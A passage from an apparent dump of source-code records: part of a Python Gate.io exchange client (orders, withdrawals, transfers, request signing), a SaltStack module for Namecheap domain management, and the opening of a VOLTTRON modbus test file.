params = self.omit(params, 'network')\n response = self.privateWithdrawalsPost(self.extend(request, params))\n #\n # {\n # \"id\": \"w13389675\",\n # \"currency\": \"USDT\",\n # \"amount\": \"50\",\n # \"address\": \"TUu2rLFrmzUodiWfYki7QCNtv1akL682p1\",\n # \"memo\": null\n # }\n #\n currencyId = self.safe_string(response, 'currency')\n id = self.safe_string(response, 'id')\n return {\n 'info': response,\n 'id': id,\n 'code': self.safe_currency_code(currencyId),\n 'amount': self.safe_number(response, 'amount'),\n 'address': self.safe_string(response, 'address'),\n 'tag': self.safe_string(response, 'memo'),\n }\n\n def parse_transaction_status(self, status):\n statuses = {\n 'PEND': 'pending',\n 'REQUEST': 'pending',\n 'DMOVE': 'pending',\n 'CANCEL': 'failed',\n 'DONE': 'ok',\n }\n return self.safe_string(statuses, status, status)\n\n def parse_transaction_type(self, type):\n types = {\n 'd': 'deposit',\n 'w': 'withdrawal',\n }\n return self.safe_string(types, type, type)\n\n def parse_transaction(self, transaction, currency=None):\n #\n # deposits\n #\n # {\n # \"id\": \"d33361395\",\n # \"currency\": \"USDT_TRX\",\n # \"address\": \"TErdnxenuLtXfnMafLbfappYdHtnXQ5U4z\",\n # \"amount\": \"100\",\n # \"txid\": \"ae9374de34e558562fe18cbb1bf9ab4d9eb8aa7669d65541c9fa2a532c1474a0\",\n # \"timestamp\": \"1626345819\",\n # \"status\": \"DONE\",\n # \"memo\": \"\"\n # }\n #\n # withdrawals\n id = self.safe_string(transaction, 'id')\n type = None\n if id is not None:\n type = self.parse_transaction_type(id[0])\n currencyId = self.safe_string(transaction, 'currency')\n code = self.safe_currency_code(currencyId)\n amount = self.safe_number(transaction, 'amount')\n txid = 
self.safe_string(transaction, 'txid')\n rawStatus = self.safe_string(transaction, 'status')\n status = self.parse_transaction_status(rawStatus)\n address = self.safe_string(transaction, 'address')\n fee = self.safe_number(transaction, 'fee')\n tag = self.safe_string(transaction, 'memo')\n if tag == '':\n tag = None\n timestamp = self.safe_timestamp(transaction, 'timestamp')\n return {\n 'info': transaction,\n 'id': id,\n 'txid': txid,\n 'currency': code,\n 'amount': amount,\n 'address': address,\n 'tag': tag,\n 'status': status,\n 'type': type,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'fee': fee,\n }\n\n def create_order(self, symbol, type, side, amount, price=None, params={}):\n #\n # :param(str) symbol: base/quote currency pair\n # :param(str) type: Order type(limit, market, ...)\n # :param(str) side: buy or sell\n # :param(number) amount: Amount of base currency ordered\n # :param(number) price: Price of the base currency using quote currency\n # :param(dict) params:\n # - type: market type(spot, futures, ...)\n # - reduceOnly\n self.load_markets()\n market = self.market(symbol)\n defaultType = self.safe_string_2(self.options, 'createOrder', 'defaultType', 'spot')\n marketType = self.safe_string(params, 'type', defaultType)\n contract = market['contract']\n request = self.prepare_request(market)\n reduceOnly = self.safe_value(params, 'reduceOnly')\n params = self.omit(params, 'reduceOnly')\n if reduceOnly is not None:\n if not contract:\n raise InvalidOrder(self.id + ' createOrder() does not support reduceOnly for ' + marketType + ' orders, reduceOnly orders are supported for futures and perpetuals only')\n request['reduce_only'] = reduceOnly\n if contract:\n if side == 'sell':\n amount = 0 - amount\n request['size'] = self.parse_number(self.amount_to_precision(symbol, amount))\n else:\n request['side'] = side\n request['type'] = type\n request['amount'] = self.amount_to_precision(symbol, amount)\n request['account'] = marketType\n # if margin:\n # if entering trade:\n # request['auto_borrow'] = True\n # elif exiting trade:\n # request['auto_repay'] = True\n # }\n # }\n if type == 'limit':\n if not price:\n raise ArgumentsRequired('Argument price is required for ' + self.id + '.createOrder for limit orders')\n request['price'] = self.price_to_precision(symbol, price)\n elif (type == 'market') and contract:\n request['tif'] = 'ioc'\n request['price'] = 0\n method = self.get_supported_mapping(market['type'], {\n 'spot': 'privateSpotPostOrders',\n # 'margin': 'privateSpotPostOrders',\n 'swap': 'privateFuturesPostSettleOrders',\n 'future': 'privateDeliveryPostSettleOrders',\n })\n response = getattr(self, method)(self.extend(request, params))\n return self.parse_order(response, market)\n\n def parse_order_status(self, status):\n statuses = {\n 'filled': 'closed',\n 'cancelled': 'canceled',\n 'liquidated': 'closed',\n }\n return self.safe_string(statuses, status, status)\n\n def parse_order(self, order, market=None):\n #\n # createOrder, spot\n #\n # {\n # \"id\": \"62364648575\",\n # \"text\": \"apiv4\",\n # \"create_time\": \"1626354834\",\n # \"update_time\": \"1626354834\",\n # \"create_time_ms\": \"1626354833544\",\n # \"update_time_ms\": \"1626354833544\",\n # \"status\": \"open\",\n # \"currency_pair\": \"BTC_USDT\",\n # \"type\": \"limit\",\n # \"account\": \"spot\",\n # \"side\": \"buy\",\n # \"amount\": \"0.0001\",\n # \"price\": \"30000\",\n # \"time_in_force\": \"gtc\",\n # \"iceberg\": \"0\",\n # \"left\": \"0.0001\",\n # \"fill_price\": \"0\",\n # 
\"filled_total\": \"0\",\n # \"fee\": \"0\",\n # \"fee_currency\": \"BTC\",\n # \"point_fee\": \"0\",\n # \"gt_fee\": \"0\",\n # \"gt_discount\": True,\n # \"rebated_fee\": \"0\",\n # \"rebated_fee_currency\": \"USDT\"\n # }\n #\n #\n id = self.safe_string(order, 'id')\n marketId = self.safe_string_2(order, 'currency_pair', 'contract')\n symbol = self.safe_symbol(marketId, market)\n timestamp = self.safe_timestamp(order, 'create_time')\n timestamp = self.safe_integer(order, 'create_time_ms', timestamp)\n lastTradeTimestamp = self.safe_timestamp(order, 'update_time')\n lastTradeTimestamp = self.safe_integer(order, 'update_time_ms', lastTradeTimestamp)\n amountRaw = self.safe_string_2(order, 'amount', 'size')\n amount = Precise.string_abs(amountRaw)\n price = self.safe_string(order, 'price')\n average = self.safe_string(order, 'fill_price')\n remaining = self.safe_string(order, 'left')\n cost = self.safe_string(order, 'filled_total') # same as filled_price\n rawStatus = None\n side = None\n contract = self.safe_value(market, 'contract')\n if contract:\n side = 'buy' if Precise.string_gt(amountRaw, '0') else 'sell'\n rawStatus = self.safe_string(order, 'finish_as', 'open')\n else:\n # open, closed, cancelled - almost already ccxt unified!\n rawStatus = self.safe_string(order, 'status')\n side = self.safe_string(order, 'side')\n status = self.parse_order_status(rawStatus)\n type = self.safe_string(order, 'type')\n timeInForce = self.safe_string_upper_2(order, 'time_in_force', 'tif')\n fees = []\n gtFee = self.safe_number(order, 'gt_fee')\n if gtFee:\n fees.append({\n 'currency': 'GT',\n 'cost': gtFee,\n })\n fee = self.safe_number(order, 'fee')\n if fee:\n fees.append({\n 'currency': self.safe_currency_code(self.safe_string(order, 'fee_currency')),\n 'cost': fee,\n })\n rebate = self.safe_string(order, 'rebated_fee')\n if rebate:\n fees.append({\n 'currency': self.safe_currency_code(self.safe_string(order, 'rebated_fee_currency')),\n 'cost': self.parse_number(Precise.string_neg(rebate)),\n })\n mkfr = self.safe_number(order, 'mkfr')\n tkfr = self.safe_number(order, 'tkfr')\n if mkfr:\n fees.append({\n 'currency': self.safe_currency_code(self.safe_string(order, 'settleId')),\n 'cost': mkfr,\n })\n if tkfr:\n fees.append({\n 'currency': self.safe_currency_code(self.safe_string(market, 'settleId')),\n 'cost': tkfr,\n })\n return self.safe_order2({\n 'id': id,\n 'clientOrderId': id,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'lastTradeTimestamp': lastTradeTimestamp,\n 'status': status,\n 'symbol': symbol,\n 'type': type,\n 'timeInForce': timeInForce,\n 'postOnly': None,\n 'side': side,\n 'price': price,\n 'stopPrice': None,\n 'average': average,\n 'amount': amount,\n 'cost': cost,\n 'filled': None,\n 'remaining': remaining,\n 'fee': None,\n 'fees': fees,\n 'trades': None,\n 'info': order,\n }, market)\n\n def fetch_order(self, id, symbol=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchOrder() requires a symbol argument')\n self.load_markets()\n market = self.market(symbol)\n request = {\n 'order_id': id,\n }\n if market['spot'] or market['margin']:\n request['currency_pair'] = market['id']\n else:\n request['settle'] = market['settleId']\n method = self.get_supported_mapping(market['type'], {\n 'spot': 'privateSpotGetOrdersOrderId',\n # 'margin': 'publicMarginGetTickers',\n 'swap': 'privateFuturesGetSettleOrdersOrderId',\n 'futures': 'privateDeliveryGetSettlePriceOrdersOrderId',\n })\n response = getattr(self, method)(self.extend(request, 
params))\n return self.parse_order(response, market)\n\n def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):\n self.load_markets()\n defaultType = self.safe_string_2(self.options, 'fetchMarkets', 'defaultType', 'spot')\n type = self.safe_string(params, 'type', defaultType)\n if symbol is None and (type == 'spot') or type == 'margin' or type == 'cross_margin':\n request = {\n # 'page': 1,\n # 'limit': limit,\n 'account': type, # spot/margin(default), cross_margin\n }\n if limit is not None:\n request['limit'] = limit\n response = self.privateSpotGetOpenOrders(self.extend(request, params))\n #\n # [\n # {\n # \"currency_pair\": \"ETH_BTC\",\n # \"total\": 1,\n # \"orders\": [\n # {\n # \"id\": \"12332324\",\n # \"text\": \"t-123456\",\n # \"create_time\": \"1548000000\",\n # \"update_time\": \"1548000100\",\n # \"currency_pair\": \"ETH_BTC\",\n # \"status\": \"open\",\n # \"type\": \"limit\",\n # \"account\": \"spot\",\n # \"side\": \"buy\",\n # \"amount\": \"1\",\n # \"price\": \"5.00032\",\n # \"time_in_force\": \"gtc\",\n # \"left\": \"0.5\",\n # \"filled_total\": \"2.50016\",\n # \"fee\": \"0.005\",\n # \"fee_currency\": \"ETH\",\n # \"point_fee\": \"0\",\n # \"gt_fee\": \"0\",\n # \"gt_discount\": False,\n # \"rebated_fee\": \"0\",\n # \"rebated_fee_currency\": \"BTC\"\n # }\n # ]\n # },\n # ...\n # ]\n #\n allOrders = []\n for i in range(0, len(response)):\n entry = response[i]\n orders = self.safe_value(entry, 'orders', [])\n parsed = self.parse_orders(orders, None, since, limit)\n allOrders = self.array_concat(allOrders, parsed)\n return self.filter_by_since_limit(allOrders, since, limit)\n return self.fetch_orders_by_status('open', symbol, since, limit, params)\n\n def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):\n return self.fetch_orders_by_status('finished', symbol, since, limit, params)\n\n def fetch_orders_by_status(self, status, symbol=None, since=None, limit=None, params={}):\n self.load_markets()\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchOrdersByStatus requires a symbol argument')\n market = self.market(symbol)\n request = self.prepare_request(market)\n request['status'] = status\n if limit is not None:\n request['limit'] = limit\n if since is not None and (market['spot'] or market['margin']):\n request['start'] = int(since / 1000)\n method = self.get_supported_mapping(market['type'], {\n 'spot': 'privateSpotGetOrders',\n 'margin': 'privateSpotGetOrders',\n 'swap': 'privateFuturesGetSettleOrders',\n 'futures': 'privateDeliveryGetSettleOrders',\n })\n if market['type'] == 'margin' or market['type'] == 'cross_margin':\n request['account'] = market['type']\n response = getattr(self, method)(self.extend(request, params))\n # SPOT\n # {\n # \"id\":\"8834234273\",\n # \"text\": \"3\",\n # \"create_time\": \"1635406193\",\n # \"update_time\": \"1635406193\",\n # \"create_time_ms\": 1635406193361,\n # \"update_time_ms\": 1635406193361,\n # \"status\": \"closed\",\n # \"currency_pair\": \"BTC_USDT\",\n # \"type\": \"limit\",\n # \"account\": \"spot\",\n # \"side\": \"sell\",\n # \"amount\": \"0.0002\",\n # \"price\": \"58904.01\",\n # \"time_in_force\":\"gtc\",\n # \"iceberg\": \"0\",\n # \"left\": \"0.0000\",\n # \"fill_price\": \"11.790516\",\n # \"filled_total\": \"11.790516\",\n # \"fee\": \"0.023581032\",\n # \"fee_currency\": \"USDT\",\n # \"point_fee\": \"0\",\n # \"gt_fee\": \"0\",\n # \"gt_discount\": False,\n # \"rebated_fee_currency\": \"BTC\"\n # }\n # Perpetual Swap\n # {\n # \"status\": 
\"finished\",\n # \"size\":-1,\n # \"left\":0,\n # \"id\":82750739203,\n # \"is_liq\":false,\n # \"is_close\":false,\n # \"contract\": \"BTC_USDT\",\n # \"text\": \"web\",\n # \"fill_price\": \"60721.3\",\n # \"finish_as\": \"filled\",\n # \"iceberg\":0,\n # \"tif\": \"ioc\",\n # \"is_reduce_only\":true,\n # \"create_time\": 1635403475.412,\n # \"finish_time\": 1635403475.4127,\n # \"price\": \"0\"\n # }\n return self.parse_orders(response, market, since, limit)\n\n def cancel_order(self, id, symbol=None, params={}):\n self.load_markets()\n if symbol is None:\n raise ArgumentsRequired(self.id + ' cancelOrders requires a symbol parameter')\n market = self.market(symbol)\n request = {\n 'order_id': id,\n }\n if market['contract']:\n request['settle'] = market['settleId']\n else:\n request['currency_pair'] = market['id']\n method = self.get_supported_mapping(market['type'], {\n 'spot': 'privateSpotDeleteOrdersOrderId',\n 'margin': 'privateSpotDeleteOrdersOrderId',\n 'swap': 'privateFuturesDeleteSettleOrdersOrderId',\n 'futures': 'privateDeliveryDeleteSettleOrdersOrderId',\n })\n response = getattr(self, method)(self.extend(request, params))\n # Perpetual swap\n # {\n # id: \"82241928192\",\n # contract: \"BTC_USDT\",\n # mkfr: \"0\",\n # tkfr: \"0.0005\",\n # tif: \"gtc\",\n # is_reduce_only: False,\n # create_time: \"1635196145.06\",\n # finish_time: \"1635196233.396\",\n # price: \"61000\",\n # size: \"4\",\n # refr: \"0\",\n # left: \"4\",\n # text: \"web\",\n # fill_price: \"0\",\n # user: \"6693577\",\n # finish_as: \"cancelled\",\n # status: \"finished\",\n # is_liq: False,\n # refu: \"0\",\n # is_close: False,\n # iceberg: \"0\",\n # }\n return self.parse_order(response, market)\n\n def transfer(self, code, amount, fromAccount, toAccount, params={}):\n self.load_markets()\n currency = self.currency(code)\n accountsByType = self.safe_value(self.options, 'accountsByType', {})\n fromId = self.safe_string(accountsByType, fromAccount, fromAccount)\n toId = self.safe_string(accountsByType, toAccount, toAccount)\n if fromId is None:\n keys = list(accountsByType.keys())\n raise ExchangeError(self.id + ' fromAccount must be one of ' + ', '.join(keys))\n if toId is None:\n keys = list(accountsByType.keys())\n raise ExchangeError(self.id + ' toAccount must be one of ' + ', '.join(keys))\n truncated = self.currency_to_precision(code, amount)\n request = {\n 'currency': currency['id'],\n 'from': fromId,\n 'to': toId,\n 'amount': truncated,\n }\n if (toId == 'futures') or (toId == 'delivery'):\n request['settle'] = currency['id']\n response = self.privateWalletPostTransfers(self.extend(request, params))\n #\n # according to the docs\n #\n # {\n # \"currency\": \"BTC\",\n # \"from\": \"spot\",\n # \"to\": \"margin\",\n # \"amount\": \"1\",\n # \"currency_pair\": \"BTC_USDT\"\n # }\n #\n # actual response\n #\n # POST https://api.gateio.ws/api/v4/wallet/transfers 204 No Content\n #\n return {\n 'info': response,\n 'from': fromId,\n 'to': toId,\n 'amount': truncated,\n 'code': code,\n }\n\n def set_leverage(self, leverage, symbol=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' setLeverage() requires a symbol argument')\n # WARNING: THIS WILL INCREASE LIQUIDATION PRICE FOR OPEN ISOLATED LONG POSITIONS\n # AND DECREASE LIQUIDATION PRICE FOR OPEN ISOLATED SHORT POSITIONS\n if (leverage < 0) or (leverage > 100):\n raise BadRequest(self.id + ' leverage should be between 1 and 100')\n self.load_markets()\n market = self.market(symbol)\n method = 
self.get_supported_mapping(market['type'], {\n 'swap': 'privateFuturesPostSettlePositionsContractLeverage',\n 'futures': 'privateDeliveryPostSettlePositionsContractLeverage',\n })\n request = self.prepare_request(market)\n request['query'] = {\n 'leverage': str(leverage),\n }\n if 'cross_leverage_limit' in params:\n if leverage != 0:\n raise BadRequest(self.id + ' cross margin leverage(valid only when leverage is 0)')\n request['cross_leverage_limit'] = str(params['cross_leverage_limit'])\n params = self.omit(params, 'cross_leverage_limit')\n response = getattr(self, method)(self.extend(request, params))\n #\n # {\n # \"value\":\"0\",\n # \"leverage\":\"5\",\n # \"mode\":\"single\",\n # \"realised_point\":\"0\",\n # \"contract\":\"BTC_USDT\",\n # \"entry_price\":\"0\",\n # \"mark_price\":\"62035.86\",\n # \"history_point\":\"0\",\n # \"realised_pnl\":\"0\",\n # \"close_order\":null,\n # \"size\":0,\n # \"cross_leverage_limit\":\"0\",\n # \"pending_orders\":0,\n # \"adl_ranking\":6,\n # \"maintenance_rate\":\"0.005\",\n # \"unrealised_pnl\":\"0\",\n # \"user\":2436035,\n # \"leverage_max\":\"100\",\n # \"history_pnl\":\"0\",\n # \"risk_limit\":\"1000000\",\n # \"margin\":\"0\",\n # \"last_close_pnl\":\"0\",\n # \"liq_price\":\"0\"\n # }\n #\n return response\n\n def sign(self, path, api=[], method='GET', params={}, headers=None, body=None):\n authentication = api[0] # public, private\n type = api[1] # spot, margin, futures, delivery\n query = self.omit(params, self.extract_params(path))\n path = self.implode_params(path, params)\n endPart = (path == '' if '' else '/' + path)\n entirePath = '/' + type + endPart\n url = self.urls['api'][authentication] + entirePath\n if authentication == 'public':\n if query:\n url += '?' + self.urlencode(query)\n else:\n queryString = ''\n if (method == 'GET') or (method == 'DELETE'):\n if query:\n queryString = self.urlencode(query)\n url += '?' + queryString\n else:\n urlQueryParams = self.safe_value(query, 'query', {})\n if urlQueryParams:\n queryString = self.urlencode(urlQueryParams)\n url += '?' + queryString\n query = self.omit(query, 'query')\n body = self.json(query)\n bodyPayload = '' if (body is None) else body\n bodySignature = self.hash(self.encode(bodyPayload), 'sha512')\n timestamp = self.seconds()\n timestampString = str(timestamp)\n signaturePath = '/api/' + self.version + entirePath\n payloadArray = [method.upper(), signaturePath, queryString, bodySignature, timestampString]\n # eslint-disable-next-line quotes\n payload = \"\\n\".join(payloadArray)\n signature = self.hmac(self.encode(payload), self.encode(self.secret), hashlib.sha512)\n headers = {\n 'KEY': self.apiKey,\n 'Timestamp': timestampString,\n 'SIGN': signature,\n 'Content-Type': 'application/json',\n }\n return {'url': url, 'method': method, 'body': body, 'headers': headers}\n\n def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):\n label = self.safe_string(response, 'label')\n if label is not None:\n message = self.safe_string_2(response, 'message', 'detail', '')\n Error = self.safe_value(self.exceptions, label, ExchangeError)\n raise Error(self.id + ' ' + message)\n"} {"ext": "py", "sha": "1a303f5dd3f04b543141a87c6dbda94b607b0415", "content": "# -*- coding: utf-8 -*-\n'''\nNamecheap domains management\n\n .. versionadded:: 2017.7.0\n\n General Notes\n -------------\n\n Use this module to manage domains through the namecheap\n api. 
The Namecheap settings will be set in grains.\n\n Installation Prerequisites\n --------------------------\n\n - This module uses the following python libraries to communicate to\n the namecheap API:\n\n * ``requests``\n .. code-block:: bash\n\n pip install requests\n\n - As saltstack depends on ``requests`` this shouldn't be a problem\n\n Prerequisite Configuration\n --------------------------\n\n - The namecheap username, api key and url should be set in a minion\n configuration file or pillar\n\n .. code-block:: yaml\n\n namecheap.name: companyname\n namecheap.key: a1b2c3d4e5f67a8b9c0d1e2f3\n namecheap.client_ip: 162.155.30.172\n #Real url\n namecheap.url: https://api.namecheap.com/xml.response\n #Sandbox url\n #namecheap.url: https://api.sandbox.namecheap.xml.response\n\n'''\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nCAN_USE_NAMECHEAP = True\n\ntry:\n import salt.utils.namecheap\nexcept ImportError:\n CAN_USE_NAMECHEAP = False\n\n# Import 3rd-party libs\nfrom salt.ext import six\n\n\ndef __virtual__():\n '''\n Check to make sure requests and xml are installed and requests\n '''\n if CAN_USE_NAMECHEAP:\n return 'namecheap_domains'\n return False\n\n\ndef reactivate(domain_name):\n '''\n Try to reactivate the expired domain name\n\n returns the following information in a dictionary\n issuccess bool indicates whether the domain was renewed successfully\n amount charged for reactivation\n orderid unique integer value for the order\n transactionid unique integer value for the transaction\n\n CLI Example:\n\n .. code-block:: bash\n\n salt 'my-minion' namecheap_domains.reactivate my-domain-name\n\n '''\n opts = salt.utils.namecheap.get_opts('namecheap.domains.reactivate')\n opts['DomainName'] = domain_name\n\n response_xml = salt.utils.namecheap.post_request(opts)\n\n if response_xml is None:\n return {}\n\n domainreactivateresult = response_xml.getElementsByTagName('DomainReactivateResult')[0]\n return salt.utils.namecheap.xml_to_dict(domainreactivateresult)\n\n\ndef renew(domain_name, years, promotion_code=None):\n '''\n Try to renew the specified expiring domain name for a specified number of years\n\n returns the following information in a dictionary\n renew bool indicates whether the domain was renewed successfully\n domainid unique integer value for the domain\n orderid unique integer value for the order\n transactionid unique integer value for the transaction\n amount charged for renewal\n\n Required parameters:\n domain_name\n string The domain name you wish to renew\n\n CLI Example:\n\n .. 
code-block:: bash\n\n salt 'my-minion' namecheap_domains.renew my-domain-name 5\n '''\n\n opts = salt.utils.namecheap.get_opts('namecheap.domains.renew')\n opts['DomainName'] = domain_name\n opts['Years'] = years\n if promotion_code is not None:\n opts['PromotionCode'] = promotion_code\n\n response_xml = salt.utils.namecheap.post_request(opts)\n\n if response_xml is None:\n return {}\n\n domainrenewresult = response_xml.getElementsByTagName(\"DomainRenewResult\")[0]\n return salt.utils.namecheap.xml_to_dict(domainrenewresult)\n\n\ndef create(domain_name, years, **kwargs):\n '''\n Try to create the specified domain name for the specified number of years\n\n returns the following information in a dictionary\n registered True/False\n amount charged for registration\n domainid unique integer value for the domain\n orderid unique integer value for the order\n transactionid unique integer value for the transaction\n whoisguardenable True,False if enabled for this domain\n nonrealtimedomain True,False if domain registration is instant or not\n\n CLI Example:\n\n .. code-block:: bash\n\n salt 'my-minion' namecheap_domains.create my-domain-name 2\n '''\n idn_codes = set(['afr',\n 'alb',\n 'ara',\n 'arg',\n 'arm',\n 'asm',\n 'ast',\n 'ave',\n 'awa',\n 'aze',\n 'bak',\n 'bal',\n 'ban',\n 'baq',\n 'bas',\n 'bel',\n 'ben',\n 'bho',\n 'bos',\n 'bul',\n 'bur',\n 'car',\n 'cat',\n 'che',\n 'chi',\n 'chv',\n 'cop',\n 'cos',\n 'cze',\n 'dan',\n 'div',\n 'doi',\n 'dut',\n 'eng',\n 'est',\n 'fao',\n 'fij',\n 'fin',\n 'fre',\n 'fry',\n 'geo',\n 'ger',\n 'gla',\n 'gle',\n 'gon',\n 'gre',\n 'guj',\n 'heb',\n 'hin',\n 'hun',\n 'inc',\n 'ind',\n 'inh',\n 'isl',\n 'ita',\n 'jav',\n 'jpn',\n 'kas',\n 'kaz',\n 'khm',\n 'kir',\n 'kor',\n 'kur',\n 'lao',\n 'lav',\n 'lit',\n 'ltz',\n 'mal',\n 'mkd',\n 'mlt',\n 'mol',\n 'mon',\n 'mri',\n 'msa',\n 'nep',\n 'nor',\n 'ori',\n 'oss',\n 'pan',\n 'per',\n 'pol',\n 'por',\n 'pus',\n 'raj',\n 'rum',\n 'rus',\n 'san',\n 'scr',\n 'sin',\n 'slo',\n 'slv',\n 'smo',\n 'snd',\n 'som',\n 'spa',\n 'srd',\n 'srp',\n 'swa',\n 'swe',\n 'syr',\n 'tam',\n 'tel',\n 'tgk',\n 'tha',\n 'tib',\n 'tur',\n 'ukr',\n 'urd',\n 'uzb',\n 'vie',\n 'wel',\n 'yid'])\n\n require_opts = ['AdminAddress1', 'AdminCity', 'AdminCountry', 'AdminEmailAddress', 'AdminFirstName',\n 'AdminLastName', 'AdminPhone', 'AdminPostalCode', 'AdminStateProvince', 'AuxBillingAddress1',\n 'AuxBillingCity', 'AuxBillingCountry', 'AuxBillingEmailAddress', 'AuxBillingFirstName',\n 'AuxBillingLastName', 'AuxBillingPhone', 'AuxBillingPostalCode', 'AuxBillingStateProvince',\n 'RegistrantAddress1', 'RegistrantCity', 'RegistrantCountry', 'RegistrantEmailAddress',\n 'RegistrantFirstName', 'RegistrantLastName', 'RegistrantPhone', 'RegistrantPostalCode',\n 'RegistrantStateProvince', 'TechAddress1', 'TechCity', 'TechCountry', 'TechEmailAddress',\n 'TechFirstName', 'TechLastName', 'TechPhone', 'TechPostalCode', 'TechStateProvince', 'Years']\n opts = salt.utils.namecheap.get_opts('namecheap.domains.create')\n opts['DomainName'] = domain_name\n opts['Years'] = six.text_type(years)\n\n def add_to_opts(opts_dict, kwargs, value, suffix, prefices):\n for prefix in prefices:\n nextkey = prefix + suffix\n if nextkey not in kwargs:\n opts_dict[nextkey] = value\n\n for key, value in six.iteritems(kwargs):\n if key.startswith('Registrant'):\n add_to_opts(opts, kwargs, value, key[10:], ['Tech', 'Admin', 'AuxBilling', 'Billing'])\n\n if key.startswith('Tech'):\n add_to_opts(opts, kwargs, value, key[4:], ['Registrant', 'Admin', 'AuxBilling', 'Billing'])\n\n 
if key.startswith('Admin'):\n add_to_opts(opts, kwargs, value, key[5:], ['Registrant', 'Tech', 'AuxBilling', 'Billing'])\n\n if key.startswith('AuxBilling'):\n add_to_opts(opts, kwargs, value, key[10:], ['Registrant', 'Tech', 'Admin', 'Billing'])\n\n if key.startswith('Billing'):\n add_to_opts(opts, kwargs, value, key[7:], ['Registrant', 'Tech', 'Admin', 'AuxBilling'])\n\n if key == 'IdnCode' and key not in idn_codes:\n salt.utils.namecheap.log.error('Invalid IdnCode')\n raise Exception('Invalid IdnCode')\n\n opts[key] = value\n\n for requiredkey in require_opts:\n if requiredkey not in opts:\n salt.utils.namecheap.log.error(\"Missing required parameter '\" + requiredkey + \"'\")\n raise Exception(\"Missing required parameter '\" + requiredkey + \"'\")\n\n response_xml = salt.utils.namecheap.post_request(opts)\n\n if response_xml is None:\n return {}\n\n domainresult = response_xml.getElementsByTagName(\"DomainCreateResult\")[0]\n return salt.utils.namecheap.atts_to_dict(domainresult)\n\n\ndef check(*domains_to_check):\n '''\n Checks the availability of domains\n\n returns a dictionary where the domain name is the key and\n the availability is the value of True/False\n\n domains_to_check\n array of strings List of domains to check\n\n CLI Example:\n\n .. code-block:: bash\n\n salt 'my-minion' namecheap_domains.check domain-to-check\n '''\n opts = salt.utils.namecheap.get_opts('namecheap.domains.check')\n opts['DomainList'] = ','.join(domains_to_check)\n\n response_xml = salt.utils.namecheap.get_request(opts)\n\n if response_xml is None:\n return {}\n\n domains_checked = {}\n for result in response_xml.getElementsByTagName(\"DomainCheckResult\"):\n available = result.getAttribute(\"Available\")\n domains_checked[result.getAttribute(\"Domain\").lower()] = salt.utils.namecheap.string_to_value(available)\n\n return domains_checked\n\n\ndef get_info(domain_name):\n '''\n Returns information about the requested domain\n\n returns a dictionary of information about the domain_name\n\n domain_name\n string Domain name to get information about\n\n CLI Example:\n\n .. code-block:: bash\n\n salt 'my-minion' namecheap_domains.get_info my-domain-name\n '''\n opts = salt.utils.namecheap.get_opts('namecheap.domains.getinfo')\n opts['DomainName'] = domain_name\n\n response_xml = salt.utils.namecheap.get_request(opts)\n\n if response_xml is None:\n return []\n\n domaingetinforesult = response_xml.getElementsByTagName(\"DomainGetInfoResult\")[0]\n\n return salt.utils.namecheap.xml_to_dict(domaingetinforesult)\n\n\ndef get_tld_list():\n '''\n Returns a list of TLDs as objects\n\n CLI Example:\n\n .. 
code-block:: bash\n\n salt 'my-minion' namecheap_domains.get_tld_list\n '''\n\n response_xml = salt.utils.namecheap.get_request(salt.utils.namecheap.get_opts('namecheap.domains.gettldlist'))\n\n if response_xml is None:\n return []\n\n tldresult = response_xml.getElementsByTagName(\"Tlds\")[0]\n tlds = []\n\n for e in tldresult.getElementsByTagName(\"Tld\"):\n tld = salt.utils.namecheap.atts_to_dict(e)\n tld['data'] = e.firstChild.data\n categories = []\n subcategories = e.getElementsByTagName(\"Categories\")[0]\n for c in subcategories.getElementsByTagName(\"TldCategory\"):\n categories.append(salt.utils.namecheap.atts_to_dict(c))\n tld['categories'] = categories\n tlds.append(tld)\n\n return tlds\n\n\ndef get_list(list_type=None,\n search_term=None,\n page=None,\n page_size=None,\n sort_by=None):\n '''\n Returns a list of domains for the particular user as a list of objects\n offset by ``page`` length of ``page_size``\n\n list_type\n string Possible values are ALL/EXPIRING/EXPIRED\n Default: ALL\n\n search_term\n string Keyword to look for on the domain list\n\n page\n integer Page to return\n Default: 1\n\n page_size\n integer Number of domains to be listed in a page\n Minimum value is 10 and maximum value is 100\n Default: 20\n\n sort_by\n string Possible values are NAME/NAME_DESC/EXPIREDATE/\n EXPIREDATE_DESC/CREATEDATE/CREATEDATE_DESC\n\n CLI Example:\n\n .. code-block:: bash\n\n salt 'my-minion' namecheap_domains.get_list\n '''\n opts = salt.utils.namecheap.get_opts('namecheap.domains.getList')\n\n if list_type is not None:\n if list_type not in ['ALL', 'EXPIRING', 'EXPIRED']:\n salt.utils.namecheap.log.error('Invalid option for list_type')\n raise Exception('Invalid option for list_type')\n opts['ListType'] = list_type\n\n if search_term is not None:\n if len(search_term) > 70:\n salt.utils.namecheap.log.warning('search_term trimmed to first 70 characters')\n search_term = search_term[0:70]\n opts['SearchTerm'] = search_term\n\n if page is not None:\n opts['Page'] = page\n\n if page_size is not None:\n if page_size > 100 or page_size < 10:\n salt.utils.namecheap.log.error('Invalid option for page')\n raise Exception('Invalid option for page')\n opts['PageSize'] = page_size\n\n if sort_by is not None:\n if sort_by not in ['NAME', 'NAME_DESC', 'EXPIREDATE', 'EXPIREDATE_DESC', 'CREATEDATE', 'CREATEDATE_DESC']:\n salt.utils.namecheap.log.error('Invalid option for sort_by')\n raise Exception('Invalid option for sort_by')\n opts['SortBy'] = sort_by\n\n response_xml = salt.utils.namecheap.get_request(opts)\n\n if response_xml is None:\n return []\n\n domainresult = response_xml.getElementsByTagName(\"DomainGetListResult\")[0]\n\n domains = []\n for d in domainresult.getElementsByTagName(\"Domain\"):\n domains.append(salt.utils.namecheap.atts_to_dict(d))\n\n return domains\n"} {"ext": "py", "sha": "1a304133d9c9c3a4d15a88abf0d59cfa798ca46c", "content": "import pytest\nimport gevent\nimport logging\nimport time\n\nfrom volttron.platform import get_services_core\nfrom master_driver.interfaces.modbus_tk.server import Server\nfrom master_driver.interfaces.modbus_tk.maps import Map, Catalog\n\nlogger = logging.getLogger(__name__)\n\n# modbus_tk driver 